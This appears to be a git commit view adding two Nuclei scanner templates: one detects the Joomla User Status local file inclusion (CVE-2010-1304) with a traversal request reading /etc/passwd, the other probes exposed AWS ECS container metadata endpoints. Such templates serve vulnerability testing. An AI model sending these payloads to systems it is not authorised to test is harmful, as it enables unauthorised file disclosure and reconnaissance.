Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates
commit
ef158cfa21
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1304
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component User Status - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/11998
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1304
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: aws-ecs-container-agent-tasks
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: aws-ecs-container-agent-tasks
|
||||||
|
author: dogasantos
|
||||||
|
severity: info
|
||||||
|
tags: aws,docker,ec2
|
||||||
|
description: Aws container metadata content
|
||||||
|
reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/v1/metadata"
|
||||||
|
- "{{BaseURL}}/v1/tasks"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "arn:aws:ecs"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue